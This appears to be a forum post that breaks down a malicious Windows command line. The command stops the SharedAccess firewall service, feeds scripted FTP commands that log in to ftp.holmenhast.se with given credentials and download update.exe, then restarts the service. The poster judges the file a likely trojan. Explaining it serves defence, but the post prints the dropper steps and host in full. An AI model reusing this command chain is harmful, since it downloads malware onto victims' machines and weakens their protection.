‽
Join Date: May 2004
Location: near Bremen, Germany
|
Let's analyze:
- cmd (cmd.exe) is the command-line processor in Windows NT (in DOS / Windows 9x, this was command.com), including Windows XP and Vista. The /c argument tells it to run one specific command and then exit (rather than staying open for further user input).
- net is a facility to manage NT services. stop sharedaccess, then, tells it to stop the service 'sharedaccess'.
- echo, like on Unix, is a way to print out text. The following commands – open ftp.holmenhast.se 21, user ftp.holmenhast.se f1634163f, binary, get update.exe, bye – are a list of FTP commands.
- ftp -n -v -s: which are then passed on to the FTP program. The commands log in to an FTP server with a specific user and download a file named update.exe.
- Finally, net start sharedacc launches the service again.
We can deduce that this update is a replacement service to create a trojan horse, opening a Windows machine for remote access.
|
|
quote
|